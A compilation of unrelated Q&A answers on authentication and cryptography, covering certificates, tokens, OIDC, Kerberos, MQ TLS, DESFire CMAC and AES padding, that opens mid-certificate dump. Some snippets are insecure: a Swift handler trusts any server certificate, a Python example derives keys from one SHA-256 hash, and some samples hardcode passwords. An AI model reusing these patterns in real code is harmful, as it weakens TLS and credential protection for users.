         5e:8b:31:8b:60:08:89:2d:0c:06:5c:52:b7:c4:f9:0a:98:d1:
         15:5f:9f:12:be:7c:36:63:38:bd:44:a4:7f:e4:26:2b:0a:c4:
         97:69:0d:e9:8c:e2:c0:10:57:b8:c8:76:12:91:55:f2:48:69:
         d8:bc:2a:02:5b:0f:44:d4:20:31:db:f4:ba:70:26:5d:90:60:
         9e:bc:4b:17:09:2f:b4:cb:1e:43:68:c9:07:27:c1:d2:5c:f7:
         ea:21:b9:68:12:9c:3c:9c:bf:9e:fc:80:5c:9b:63:cd:ec:47:
         aa:25:27:67:a0:37:f3:00:82:7d:54:d7:a9:f8:e9:2e:13:a3:
         77:e8:1f:4a
...

"I have generated a self-signed certificate using this very good tutorial: https://www.youtube.com/watch?v=1xtBkukWiek." I did not watch your video, but you may be interested in the following if you are missing attributes like the Authority Key Identifier (AKI):

How do you sign Certificate Signing Request with your Certification Authority
How to create a self-signed certificate with openssl?
You could use a Value Converter to process objects. In fact, there is a nice example for that in the [Documentation, last section]. Applying the above example to your case, it's even possible to process objects without any prior transformation. Gist demo: https://gist.run/?id=4514caa6ee7d40df2f7cfe2605451a0e I wouldn't say it's the most optimal solution, though. You might want to transform the data somehow before passing it to repeat.for. Just showing a possibility here. Template: <!-- First level properties --> <div repeat.for="mainKey of data | keys"> <label>${mainKey}</label> <!-- Sublevel - Value Object properties --> <select> <option value="">---</option> <option repeat.for="code of data[mainKey] | keys" value="${code}">${data[mainKey][code]}</option> </select> </div> keys value converter: export class KeysValueConverter { toView(obj) { return Reflect.ownKeys(obj); } } Update: But how do I target one specific item without having to iterate over all of them? I've extended the original gist demo; you can check it out. This would work, but it wouldn't be reusable: <label>Absence Code</label> <select> <option value="">---</option> <option repeat.for="code of data.AbsenceCode | keys" value="${code}">${data.AbsenceCode[code]}</option> </select> A better way would be to create a custom element (Note: <require> is there for demo purposes. Normally, you'd add it to globalResources.) Organizing the above template into a custom element with source and name bindable properties: source: your data object name: first-level property of data object (e.g. AbsenceCode) enum-list.html <template> <require from="./keys-value-converter"></require> <label>${name}</label> <select name="${name}" class="form-control"> <option value="">---</option> <option repeat.for="code of source[name] | keys" value="${code}">${source[name][code]}</option> </select> </template> You can also use the name property in conjunction with aurelia-i18n to display a meaningful label. E.g. ${name | t}. 
enum-list.js import {bindable} from 'aurelia-framework'; export class EnumList { @bindable source; @bindable name; } Usage Individual dropdowns: <enum-list source.bind="data" name="AbsenceCode"></enum-list> <enum-list source.bind="data" name="AuthenticationLog"></enum-list> Since <enum-list> has all the data, its name property can also be changed at runtime! :) <label>Type</label> <select class="form-control" value.bind="selectedType"> <option repeat.for="mainKey of data | keys" value="${mainKey}">${mainKey}</option> </select> <br> <enum-list source.bind="data" name.bind="selectedType"></enum-list>
A token based authentication system does not imply JWT as the token format. If you pick the Slack or MS Graph implementation and move the clientState/token from the body of the request to an Authorization header using the Bearer scheme you won't find significant differences. It's true that the header would be the most appropriate way to pass information designed to authenticate the request, and servers might treat the header in a more secure way than the request body... but for the sake of this discussion let's ignore that. The token would be a by-reference token where the actual value is meaningless and the validity and any associated information are obtained by the consumer from an independent store. In this case the validity is judged purely by ensuring the token matches the value you expect and there's no additional information stored in association with the token, but this is still an authentication system based on bearer tokens in the sense that anyone that has the token can make the request. Also, the tokens are not obtained through any OAuth 2.0 flow, but that would be overkill for scenarios like these. The Github implementation would be classified as an improvement over the pure bearer one, because there's no token traveling on the wire, only a signature of the payload, which means an attacker able to decrypt the communication channel could only replay captured requests, not issue requests with different payloads. Conclusion You probably won't find webhook implementations using full-featured OAuth 2.0 plus JWT as the token format, because it would be overkill for the use case at hand. Update: The expiration of a JWT is whatever you want it to be, as would be the expiration of by-reference tokens (what you call simple tokens). The message I was trying to pass is that you don't need JWTs, nor OAuth, to have a token based authentication system. 
The security characteristics of a token based system can be designed independently of the token format used; yes, some formats will simplify some aspects while possibly making other aspects more complex. It's always a trade-off... In a system where you only want to ensure that who's calling is someone you trust and not just a complete stranger, a JWT seems overkill; that's my opinion of course. About the simple token itself being the secret, that depends on what you exactly mean by secret. A JWT or a by-reference token used in a bearer authentication scheme gives you the exact same result if they are leaked. Whoever has the token can make requests while the token is valid. If you're referring to the secret/key used to sign the JWT, which is not transmitted on the wire, again this is something that would be exactly the same if you used a signed by-reference token. Again, the honest answer to your underlying question is that those systems added the security mechanisms they thought were worth it, taking into consideration the threat model for the system. Personally, I don't disagree with not using OAuth 2.0 plus JWT as it seems completely not worth it in that use case. My preference would be to go for the Github approach. You may not like the security characteristics that they provide, but both MS Graph and Slack approaches are token based systems using bearer tokens.
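To make the Github-style approach concrete, here is a minimal sketch of signing and verifying a webhook payload with an HMAC. The header prefix and function names are illustrative, not Github's exact scheme:

```python
import hmac
import hashlib

def sign(secret: bytes, payload: bytes) -> str:
    # The sender computes an HMAC over the raw request body and ships
    # only this signature in a header; the shared secret never travels.
    return "sha256=" + hmac.new(secret, payload, hashlib.sha256).hexdigest()

def verify(secret: bytes, payload: bytes, received: str) -> bool:
    # The receiver recomputes the HMAC and compares in constant time.
    return hmac.compare_digest(sign(secret, payload), received)
```

Because only the signature travels on the wire, an attacker who captures traffic can at most replay that exact payload, not forge requests with a different one.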
Here is the syntax as per Swift 3. First verify which branch of the delegate method is entered: open func urlSession(_ session: URLSession, didReceive challenge: URLAuthenticationChallenge, completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Swift.Void) { var disposition: URLSession.AuthChallengeDisposition = .performDefaultHandling var credential: URLCredential? if challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust { if let serverTrust = challenge.protectionSpace.serverTrust { credential = URLCredential(trust: serverTrust) disposition = .useCredential } } else { disposition = .cancelAuthenticationChallenge } completionHandler(disposition, credential) } Note that completionHandler is a non-optional closure, so there is no need to nil-check it before calling it, and the optional serverTrust is safely unwrapped instead of force-unwrapped.
Create a custom AuthenticationSuccessHandler like below public class CustomAuthenticationSuccessHandler implements AuthenticationSuccessHandler { public void onAuthenticationSuccess(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response, Authentication authentication) throws IOException, javax.servlet.ServletException { if (authentication.getAuthorities().contains(new SimpleGrantedAuthority("ROLE_ADMIN"))) { request.getRequestDispatcher("/admin").forward(request, response); } else if (authentication.getAuthorities().contains(new SimpleGrantedAuthority("ROLE_USER"))) { request.getRequestDispatcher("/user").forward(request, response); } } } And configure it with the form-login tag as follows <bean id="customAuthenticationSuccessHandler" class="CustomAuthenticationSuccessHandler" /> <form-login authentication-success-handler-ref="customAuthenticationSuccessHandler" ...> UPDATE Create a controller mapping for /landing and point to it with <form-login login-page="/landing" .../>. This landing page should have links to the admin and user landing pages, which can have links or forms to log in. You can remove protection from these landing pages. <http pattern="/landing**" security="none"/> <http pattern="/landing/admin**" security="none"/> <http pattern="/landing/user**" security="none"/> And you can write a custom AuthenticationFailureHandler to redirect to the correct login page.
Check this :) You probably need requests, if you don't have it. I don't know much about the salesforce library. import requests import pdfkit session = requests.session() def download(session, username, password): session.get('https://bneadf.thiess.com.au/adfs/ls/') ua = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' session.headers = {'User-Agent': ua} payload = {'UserName': username, 'Password': password, 'AuthMethod': 'FormsAuthentication'} session.post('https://bneadf.thiess.com.au/adfs/ls/', data=payload, headers=session.headers) my_html = session.get('https://thiess.my.salesforce.com/0069000000IZH71') my_pdf = open('myfile.html', 'wb+') my_pdf.write(my_html.content) my_pdf.close() path_wkthmltopdf = r'C:\Program Files\wkhtmltopdf\bin\wkhtmltopdf.exe' config = pdfkit.configuration(wkhtmltopdf=path_wkthmltopdf) pdfkit.from_file('myfile.html', 'out.pdf', configuration=config) download(session, "yourusername", "yourpass") Note the original snippet referenced self.ua inside a plain function (there is no self there) and created a config object without passing it to pdfkit.from_file; both are fixed above, and the Windows path is a raw string so the backslashes survive.
The ability to refresh a token programmatically without any type of user interaction is accomplished through the use of refresh tokens. However, this is not applicable for browser-based applications because refresh tokens are long-lived credentials and the storage characteristics of browsers would place them at too big a risk of being leaked. If you want to continue to use the resource owner password credentials grant you can choose to ask the user to input the credentials again when the tokens expire. As an alternative, upon authentication you can obtain the required user information and initiate an application specific session. This could be achieved by having your server-side logic create an application specific session identifier or JWT. You can also stop using the resource owner password credentials grant and redirect the user to an Auth0 authentication page that, besides returning the tokens to your application, would also maintain an authenticated session for the user, meaning that when the tokens expired and your application redirected again to Auth0, the user might not need to manually re-enter credentials because the Auth0 session is still valid. In relation to the password being sent in plaintext: the resource owner endpoint relies on HTTPS so the data is encrypted at the protocol level. You must also use HTTPS within your own application for any type of communication that includes user credentials of any kind. Also note that you can control what's returned within the ID token through the use of scopes; depending on the amount of information in question you might not even need to make additional calls to get the user profiles if you signal that you want that information to be contained within the ID token itself.
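The "application specific session identifier or JWT" mentioned above can be as simple as a server-side signed token. A hypothetical, stdlib-only sketch (not Auth0's API; the secret name and claim layout are made up for illustration):

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"server-side-secret"  # hypothetical signing key, never sent to the client

def issue_session(user_id: str, ttl: int = 3600) -> str:
    # The body carries the subject and an expiry; the MAC binds both,
    # so neither can be altered without invalidating the token.
    body = base64.urlsafe_b64encode(json.dumps(
        {"sub": user_id, "exp": int(time.time()) + ttl}).encode())
    mac = hmac.new(SECRET, body, hashlib.sha256).hexdigest()
    return body.decode() + "." + mac

def check_session(token: str):
    # Returns the claims dict if the token is authentic and unexpired, else None.
    body, mac = token.rsplit(".", 1)
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    claims = json.loads(base64.urlsafe_b64decode(body))
    return claims if claims["exp"] > time.time() else None
```

In practice you would usually reach for an off-the-shelf JWT or session library instead, but the shape of the mechanism is the same.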
This is the snippet I used. Note I am passing a user ID and password to the CreateConnection call because I have user authentication enabled. Without them, I would get an MQRC 2035 error. fact = XMSFactoryFactory.GetInstance(XMSC.CT_WMQ); conf = fact.CreateConnectionFactory(); conf.SetIntProperty(XMSC.WMQ_CONNECTION_MODE, XMSC.WMQ_CM_CLIENT_UNMANAGED); conf.SetStringProperty(XMSC.WMQ_QUEUE_MANAGER, "QM1"); conf.SetStringProperty(XMSC.WMQ_HOST_NAME, "localhost"); conf.SetIntProperty(XMSC.WMQ_PORT, 1414); conf.SetStringProperty(XMSC.WMQ_CHANNEL, "NET.SVRCONN"); conf.SetStringProperty(XMSC.WMQ_SSL_KEY_REPOSITORY, "C:\\ProgramData\\IBM\\MQ\\qmgrs\\QM1\\ssl\\CLIENT"); conf.SetStringProperty(XMSC.WMQ_SSL_CIPHER_SPEC, "TLS_RSA_WITH_AES_128_CBC_SHA"); conf.SetStringProperty(XMSC.WMQ_SSL_PEER_NAME, "CN=QM1,OU=QMHOST,OU=LAB,OU=PAS,O=COM,L=BLR,ST=KA,C=IN"); conf.SetStringProperty(XMSC.WMQ_SSL_CLIENT_CERT_LABEL, "ibmwebspheremqsamantha"); mqConn = conf.CreateConnection("samantha","Passw0ord");
Assuming your service is exposing a standard REST API (or similar) that your front-end is calling: yes, SSL is the standard. It provides: Confidentiality: the data is encrypted between the client and the server and cannot be read by an attacker. Typically implemented with a symmetric cipher such as AES, with the key negotiated during the handshake (e.g. via RSA or Diffie-Hellman key exchange). Integrity: an attacker cannot tamper with the messages sent between the client and the server. Typically implemented using an HMAC. Authentication: the client is able to check that the server it is talking to is actually yours, and not an attacker. Basically, the server shows the client a certificate signed by the Certificate Authority having issued the SSL certificate (e.g. VeriSign), which proves its identity. All that is assuming SSL is configured properly on the server's side: up-to-date ciphers, no support for outdated ones, proper key length (2048 bits or higher), etc. Note that a client can be anything calling your service: a browser-based application, a mobile application, a smart watch application... You can use SSL Labs to check if your SSL configuration looks secure.
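On the client side, most HTTP libraries enforce these checks for you. As a sketch, Python's stdlib ssl module builds a context that already requires a valid, hostname-matching certificate by default:

```python
import ssl

# create_default_context() is the stdlib's "secure by default" client setup:
# it loads the system trust store, requires a valid certificate chain,
# checks that the certificate matches the hostname you connect to,
# and disables obsolete protocol versions.
ctx = ssl.create_default_context()
assert ctx.verify_mode == ssl.CERT_REQUIRED  # certificate must validate
assert ctx.check_hostname                    # and match the requested host
```

The point is that you should never have to (and never should) turn these defaults off in production code; if certificate validation fails, the fix is on the server or trust-store side.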
Yes, it is possible to change the Reply URL dynamically using RedirectToIdentityProvider. You can refer to the code sample below: app.UseOpenIdConnectAuthentication( new OpenIdConnectAuthenticationOptions { ClientId = clientId, Authority = authority, PostLogoutRedirectUri = postLogoutRedirectUri, RedirectUri = postLogoutRedirectUri, Notifications = new OpenIdConnectAuthenticationNotifications { AuthenticationFailed = context => { context.HandleResponse(); context.Response.Redirect("/Error?message=" + context.Exception.Message); return Task.FromResult(0); }, RedirectToIdentityProvider=(context)=> { context.ProtocolMessage.RedirectUri = ""; return Task.FromResult(0); } } }); However, if the application is already deployed to a web server, changing the redirect URL to localhost may not work as you expect, since the deployed web app and your local app are two different application servers.
Firstly, no. There is no way to access cookies in another session as they only exist for the lifetime of the request/response. However, you could store a static List of all currently authenticated users and invalidate them that way. This is a bit problematic because in the case that the App Pool recycles, all users will be 'logged out'. If this is not an issue for you (i.e. the app pool recycles at 2am and it is for a business system that does not operate at 2 am) then you can try this... The code provided is untested. Source: https://msdn.microsoft.com/en-us/library/system.web.security.formsauthenticationmodule.authenticate EDIT: I was not removing the cookie from the request and expiring it in the response. In the Global.asax private static List<string> _authenticatedUsers = new List<string>(); public static void AuthenticateUser(MyApplicationUser user) { if(!_authenticatedUsers.Contains(user.Username)) { _authenticatedUsers.Add(user.Username); } } public static void DeauthenticateUser(MyApplicationUser user) { if(_authenticatedUsers.Contains(user.Username)) { _authenticatedUsers.Remove(user.Username); } } public void FormsAuthentication_OnAuthenticate(object sender, FormsAuthenticationEventArgs args) { if (FormsAuthentication.CookiesSupported) { if (Request.Cookies[FormsAuthentication.FormsCookieName] != null) { try { FormsAuthenticationTicket ticket = FormsAuthentication.Decrypt( Request.Cookies[FormsAuthentication.FormsCookieName].Value); MyApplicationUser user = JsonConvert.DeserializeObject<MyApplicationUser>(ticket.UserData); if(user == null || !_authenticatedUsers.Any(u => u == user.Username)) { // this invalidates the user args.User = null; Request.Cookies.Remove(FormsAuthentication.FormsCookieName); HttpCookie myCookie = new HttpCookie(FormsAuthentication.FormsCookieName); DateTime now = DateTime.Now; myCookie.Value = "a"; myCookie.Expires = now.AddHours(-1); Response.Cookies.Add(myCookie); Response.Redirect(FormsAuthentication.LoginUrl); Response.End(); } } catch (Exception e) { 
// Decrypt method failed. // this invalidates the user args.User = null; Request.Cookies.Remove(FormsAuthentication.FormsCookieName); HttpCookie myCookie = new HttpCookie(FormsAuthentication.FormsCookieName); DateTime now = DateTime.Now; myCookie.Value = "a"; myCookie.Expires = now.AddHours(-1); Response.Cookies.Add(myCookie); Response.Redirect(FormsAuthentication.LoginUrl); Response.End(); } } } else { throw new HttpException("Cookieless Forms Authentication is not " + "supported for this application."); } } In your login action public ActionResult Login(LoginViewModel loginViewModel) { ... if (!result.Error) { ... MvcApplication.AuthenticateUser(result.User); ... } ... } In your logout action public ActionResult Logout(...) { ... MvcApplication.DeauthenticateUser(user); ... } In your delete method ... MvcApplication.DeauthenticateUser(user); ...
OpenID/OAuth is a general protocol that allows a site (e.g. stackoverflow) to rely on an identity provider (e.g. Google) for authentication. This involves a transaction where: You tell stackoverflow that you will use Google for login. stackoverflow sends you to Google to get authenticated, with a redirect URL. Google authenticates you, effectively logging you in to their services (so as to know you are you). Google (and any other identity provider) should ask you whether you want your email and other information to be sent to stackoverflow. If you agree, Google sends this info to the consumer (stackoverflow). From this point on it is up to the auth consumer (e.g. stackoverflow) to accept this information (your email) as valid. Any scheme that does not go through the ID provider's login (step 3) will expose your credentials to a (possibly) untrusted third party (would you want stackoverflow to have your Google password?). Step 3 also installs a cookie on your machine which contains your session with Google. It is up to Google (or any ID provider) to consider this session valid for all other uses (Gmail etc.), but it is a convenient feature anyway. If you already have an established session with Google, it possibly won't require you to log in again.
You are locking down the allowed encryption types in your krb5.conf to only allow the AES128 encryption types while you want to do AES256, so that's one problem. At the very bottom of your krb5.conf the last line is wrong. Should be .athena.local=ATHENA.LOCAL (Ref: http://web.mit.edu/KERBEROS/krb5-1.5/krb5-1.5.4/doc/krb5-admin/Sample-krb5_002econf-File.html) If your keytab actually has support for AES256 encryption types in it, then the Directory account to which the keytab is related also must be enabled to support AES256 encryption types. There's a checkbox for this if you are using Active Directory. You must have an SPN registered for the service you are trying to authenticate to in the Directory/Kerberos database. If it's an HTTP service, it would look something like: HTTP/server1.athena.local You'll need the Java jurisdiction unlimited strength policy files present on your server to decrypt AES256 encryption. Last but not least, you didn't specify which directory service you are using Kerberos with. Is it Active Directory? Red Hat IdM? OpenDirectory? Heimdal? Not a lot to go on here.
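Putting the first two fixes together, the relevant krb5.conf sections might look like this (the KDC hostname is illustrative; note the leading dot on the first domain_realm entry and the AES256 enctype names):

```
[libdefaults]
    default_realm = ATHENA.LOCAL
    default_tkt_enctypes = aes256-cts-hmac-sha1-96
    default_tgs_enctypes = aes256-cts-hmac-sha1-96

[realms]
    ATHENA.LOCAL = {
        kdc = dc1.athena.local
    }

[domain_realm]
    .athena.local = ATHENA.LOCAL
    athena.local = ATHENA.LOCAL
```

The .athena.local entry maps every host under the domain to the realm, while the bare athena.local entry maps the domain apex itself.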
First of all, as others have already pointed out in the comments, you shouldn't implement your own authentication logic if you don't know what you're doing. You can use Passport for that. Now, to the code you provided. There are several problems here. The first thing that comes to mind is that you use: var isAuth = username === data['username'] & password === data['password']; instead of: var isAuth = username === data['username'] && password === data['password']; But this is just a typo. Now, to more fundamental stuff. You cannot return the isAuth variable because who are you going to return it to? If you think that it will get returned to the caller of exports.auth then you're wrong - exports.auth() will return long before the return isAuth; is ever run. Also, if you check for an error with if (err), then put the code that should run in the success case in the else block, otherwise it will also run on error, with undefined variables that may crash your program. You need to either add an additional argument to your function which is a callback: exports.auth = function(username, password, session, callback) { User.findOne({username: username}, function(err, data) { if (err) { console.log(err); callback(err); } else { var isAuth = username === data.username && password === data.password; if (isAuth) { session.isAuthenticated = isAuth; session.user = {username: username}; } callback(null, isAuth); } }); }; or to return a promise from your exports.auth function (but directly from your exports.auth function, not some other callback inside). Using the above version you can call it with: auth(username, password, session, function (err, isAuth) { // you have your isAuth here }); The other option would be to use promises. 
You can see some other answers where I explain the difference between callbacks and promises and how to use them together in more detail, which may be helpful to you in this case: A detailed explanation on how to use callbacks and promises Explanation on how to use promises in complex request handlers An explanation of what a promise really is, on the example of AJAX requests But first you need to get comfortable with callbacks. Also, never store the passwords in cleartext in the database. Seriously, use some other solution that works like Passport. I wrote the answer to explain the process of using callbacks, not to endorse the idea of using authentication in that particular way. You have been warned.
Now I have another machine with a new hard drive, so I need to setup git again. I thought I could just add the global config: git config --global user.name '<myname>' git config --global user.email '<myemail>' But it doesn't work. That's right. It would be a shame if somebody else could just run those commands and gain access to your account! Those settings are actually irrelevant to Git authentication. They just determine how commits are recorded. So it seems like I need to go through the steps mentioned in the above link all over again. That's what I'd recommend: Generate a keypair for your new machine and add it to your Bitbucket account. (Technically you could avoid creating a new keypair if you copy your existing keypair from your old machine onto your new one, but that's trickier than it sounds. OpenSSH is very picky about file permissions. I always create new keypairs per machine.) Finally, you could access your repositories via HTTPS instead of SSH. That way you'd have to enter your Bitbucket user name and password to gain access. Though if you've enabled two-factor authentication that gets trickier…
The Deleted Record record isn't supported in SuiteTalk as of version 2016_2 which means you can't run a Saved Search and pull down the results. This is not uncommon when integrating with NetSuite. :( What I've always done in these situations is create a RESTlet (NetSuite's wannabe RESTful API framework) SuiteScript that will run the search (or do whatever is possible with SuiteScript and not possible with SuiteTalk) and return the results. From the documentation: You can deploy server-side scripts that interact with NetSuite data following RESTful principles. RESTlets extend the SuiteScript API to allow custom integrations with NetSuite. Some benefits of using RESTlets include the ability to: Find opportunities to enhance usability and performance, by implementing a RESTful integration that is more lightweight and flexible than SOAP-based web services. Support stateless communication between client and server. Control client and server implementation. Use built-in authentication based on token or user credentials in the HTTP header. Develop mobile clients on platforms such as iPhone and Android. Integrate external Web-based applications such as Gmail or Google Apps. Create backends for Suitelet-based user interfaces. RESTlets offer ease of adoption for developers familiar with SuiteScript and support more behaviors than NetSuite's SOAP-based web services, which are limited to those defined as SuiteTalk operations. RESTlets are also more secure than Suitelets, which are made available to users without login. For a more detailed comparison, see RESTlets vs. Other NetSuite Integration Options. In your case this would be a near trivial script to create, it would gather the results and return JSON encoded (easiest) or whatever format you need. You will likely spend more time getting the Token Based Authentication (TBA) working than you will writing the script. 
[Update] Adding some code samples related to what I mentioned in the comments below: Note that the SuiteTalk proxy object model is frustrating in that it lacks the inheritance it could make such good use of. So you end up with code like your SafeTypeCastName(). Reflection is one of the best tools in my toolbox when it comes to working with SuiteTalk proxies. For example, all *RecordRef types have common fields/props, so reflection saves you type checking all over the place to work with the object you suspect you have. public static TType GetProperty<TType>(object record, string propertyID) { PropertyInfo pi = record.GetType().GetProperty(propertyID); return (TType)pi.GetValue(record, null); } public static string GetInternalID(Record record) { return GetProperty<string>(record, "internalId"); } public static string GetInternalID(BaseRef recordRef) { PropertyInfo pi = recordRef.GetType().GetProperty("internalId"); return (string)pi.GetValue(recordRef, null); } public static CustomFieldRef[] GetCustomFieldList(Record record) { return GetProperty<CustomFieldRef[]>(record, CustomFieldPropertyName); }
I have been looking at the exact same issue for the last few days and I think I can at least give you some pointers. Getting everything 'just so' has taken some time and the documentation from NXP (assuming you have access) is a little difficult to interpret in some cases. So, as you probably know, you need to calculate the CMAC (and update your init vec) on transmit as well as receive. You need to save the CMAC each time you calculate it as the init vec for the next crypto operation (whether CMAC or encryption etc). When calculating the CMAC for your example the data to feed into your CMAC algorithm is the INS byte (0x64) and the command data (0x00). Of course this will be padded etc as specified by CMAC. Note, however, that you do not calculate the CMAC across the entire APDU wrapping (i.e. 90 64 00 00 01 00 00) just the INS byte and data payload is used. On receive you need to take the data (0x00) and the second status byte (also 0x00) and calculate the CMAC over that. It's not important in this example but order is important here. You use the response body (excluding the CMAC) then SW2. Note that only half of the CMAC is actually sent - CMAC should yield 16 bytes and the card is sending the first 8 bytes. There were a few other things that held me up including: I was calculating the session key incorrectly - it is worth double checking this if things are not coming out as you'd expect I interpreted the documentation to say that the entire APDU structure is used to calculate the CMAC (hard to read them any other way tbh) I am still working on calculating the response from a Write Data command correctly. The command succeeds but I can't validate the CMAC. I do know that Write Data is not padded with CMAC padding but just zeros - not yet sure what else I've missed. 
Finally, here is a real example from communicating with a card from my logs: Authentication is complete (AES) and the session key is determined to be F92E48F9A6C34722A90EA29CFA0C3D12; init vec is zeros I'm going to send the Get Key Version command (as in your example) so I calculate CMAC over 6400 and get 1200551CA7E2F49514A1324B7E3428F1 (which is now my init vec for the next calculation) Send 90640000010000 to the card and receive 00C929939C467434A8 (status is 9100). Calculate CMAC over 00 00 and get C929939C467434A8A29AB2C40B977B83 (and update init vec for next calculation) The first half of our CMAC from step #4 matches the 8 byte received from the card in step #3
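The "padded etc as specified by CMAC" step above can be made concrete. When the message is not a whole number of AES blocks, CMAC (NIST SP 800-38B) appends 0x80 and then zero bytes; the full algorithm then XORs the K2 subkey into that padded final block (or K1 when no padding was needed). A stdlib-only sketch of just the padding, applied to the Get Key Version message (INS 0x64 plus data 0x00):

```python
def cmac_pad(msg: bytes, block: int = 16) -> bytes:
    # CMAC padding: only applied when the message is not already a whole
    # number of blocks - append 0x80, then zeros, up to the block boundary.
    if msg and len(msg) % block == 0:
        return msg  # complete final block: no padding, K1 subkey is used
    pad_len = block - (len(msg) % block) - 1
    return msg + b"\x80" + b"\x00" * pad_len
```

So the block actually fed into the AES-CBC chain for this command is 64 00 80 followed by thirteen zero bytes; the subkey XOR and the chained init vec are what a plain padding function like this deliberately leaves out.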
To refactor your code, you should register a service and move the authentication code into the service. Authenticate service: app.factory('authenticateService', ['$q', '$state', 'MeHelper', function($q, $state, MeHelper){ var obj = {}; obj.check_authentication = function(params) { var deferred = $q.defer(); MeHelper.ready() .then(function (me) { if (me.isAuthenticated()) { deferred.resolve(); } else { deferred.reject(); $state.go('login'); } }); return deferred.promise; } return obj; } ]); Note that $state is injected into the factory, since the service calls $state.go('login'). Then, use this service in any route file in resolve, injecting the service by name in the function parameters. Route configuration file: (function(){ 'use strict'; var app = angular.module('app'); app.config(/* @ngInject */ function($stateProvider, $urlRouterProvider) { $stateProvider .state('index', { url: "", views: { "FullContentView": { templateUrl: "start.html" } } }) .state('dashboard', { url: "/dashboard", views: { "FullContentView": { templateUrl: "dashboard/dashboard.html" } }, resolve: { authenticated: function(authenticateService) { return authenticateService.check_authentication(); } } }) $urlRouterProvider.otherwise('/404'); }); })(); Watch the lines below; this is what we changed in the route configuration to resolve. The service is injected in these lines: resolve: { authenticated: function(authenticateService) { return authenticateService.check_authentication(); } }
The id_token that you receive as the outcome of user authentication follows the OpenID Connect specification so it will include an exp claim that you can check in order to detect expiration. exp: Expiration time on or after which the ID Token MUST NOT be accepted for processing. The processing of this parameter requires that the current date/time MUST be before the expiration date/time listed in the value. Implementers MAY provide for some small leeway, usually no more than a few minutes, to account for clock skew. Its value is a JSON number representing the number of seconds from 1970-01-01T0:0:0Z as measured in UTC until the date/time. (emphasis is mine; source: OpenID Connect) If the offline_access scope is included when performing the authentication process you should get a refresh token issued alongside the ID token. According to react-native-lock documentation you can then use the authenticationAPI() method to get an Authentication API client that can be used to refresh user's token. The specific call can be seen in the react-native-auth0 documentation: .authentication('{YOUR_CLIENT_ID}') .refreshToken('user refresh_token') .then(response => console.log(response)) .catch(error => console.log(error));
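Reading the exp claim doesn't require a full JWT library, since the payload segment is just base64url-encoded JSON (the signature must still be verified server-side before trusting anything in it). A stdlib-only sketch:

```python
import base64
import json
import time

def is_expired(id_token: str, leeway: int = 60) -> bool:
    # A JWT is header.payload.signature; the payload is base64url JSON.
    payload_b64 = id_token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped padding
    claims = json.loads(base64.urlsafe_b64decode(payload_b64))
    # exp is seconds since the epoch, UTC; allow a little clock skew.
    return time.time() > claims["exp"] + leeway
```

The leeway parameter implements the "small leeway ... to account for clock skew" that the spec text quoted above explicitly permits.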
A little late, but I think this will be very helpful: no one has mentioned using a padding scheme such as PKCS#7. You can use it instead of the previous functions to pad (when encrypting) and unpad (when decrypting). The full source code is below. Note that in Decrypt the password must be encoded with .encode('utf-8'), not decoded, so the key is derived the same way as in Encrypt. import base64 import hashlib from Crypto import Random from Crypto.Cipher import AES import pkcs7 class Encryption: def __init__(self): pass def Encrypt(self, PlainText, SecurePassword): pw_encode = SecurePassword.encode('utf-8') text_encode = PlainText.encode('utf-8') key = hashlib.sha256(pw_encode).digest() iv = Random.new().read(AES.block_size) cipher = AES.new(key, AES.MODE_CBC, iv) pad_text = pkcs7.encode(text_encode) msg = iv + cipher.encrypt(pad_text) EncodeMsg = base64.b64encode(msg) return EncodeMsg def Decrypt(self, Encrypted, SecurePassword): decodbase64 = base64.b64decode(Encrypted.decode("utf-8")) pw_encode = SecurePassword.encode('utf-8') iv = decodbase64[:AES.block_size] key = hashlib.sha256(pw_encode).digest() cipher = AES.new(key, AES.MODE_CBC, iv) msg = cipher.decrypt(decodbase64[AES.block_size:]) pad_text = pkcs7.decode(msg) decryptedString = pad_text.decode('utf-8') return decryptedString import StringIO import binascii def decode(text, k=16): nl = len(text) val = int(binascii.hexlify(text[-1]), 16) if val > k: raise ValueError('Input is not padded or padding is corrupt') l = nl - val return text[:l] def encode(text, k=16): l = len(text) output = StringIO.StringIO() val = k - (l % k) for _ in xrange(val): output.write('%02x' % val) return text + binascii.unhexlify(output.getvalue())
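The pkcs7 module in this answer is written for Python 2 (StringIO, xrange, indexing bytes as characters). For reference, a minimal Python 3 sketch of the same padding scheme, with slightly stricter validation, looks like this:

```python
def pkcs7_pad(data, block_size=16):
    """Append N bytes, each of value N, so the length becomes a multiple of block_size."""
    pad_len = block_size - (len(data) % block_size)
    return data + bytes([pad_len]) * pad_len

def pkcs7_unpad(data, block_size=16):
    """Validate and strip PKCS#7 padding; reject corrupt or unpadded input."""
    if not data or len(data) % block_size:
        raise ValueError("Input is not padded or padding is corrupt")
    pad_len = data[-1]
    # every one of the last pad_len bytes must equal pad_len
    if not 1 <= pad_len <= block_size or data[-pad_len:] != bytes([pad_len]) * pad_len:
        raise ValueError("Input is not padded or padding is corrupt")
    return data[:-pad_len]
```

Because PKCS#7 always pads (a full extra block when the input is already block-aligned), unpadding is unambiguous.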
It depends on how you want to acquire the token. There are lots of scenarios for integrating an application with Azure AD; you can refer to them here. For example, if you want to use the Azure AD Graph in a daemon or service application, you can use the Client Credential flow. 1 . First we need to register a web application on the portal (detailed steps here) and grant it permission to read the directory data, as in the figure below: 2 . Then we can get the clientId, secret, and tenantId from the portal and use the code below to acquire a token (you need to install the Active Directory Authentication Library): string authority = "https://login.microsoftonline.com/{tenantId}"; string clientId = ""; string secret = ""; string resource = "https://graph.windows.net"; var credential = new ClientCredential(clientId, secret); AuthenticationContext authContext = new AuthenticationContext(authority); var token = authContext.AcquireTokenAsync(resource, credential).Result.AccessToken; Console.WriteLine(token); 3 . Then we can use this token to call the Azure AD Graph REST API directly, or we can use the Graph client library for Azure AD to retrieve the users. 
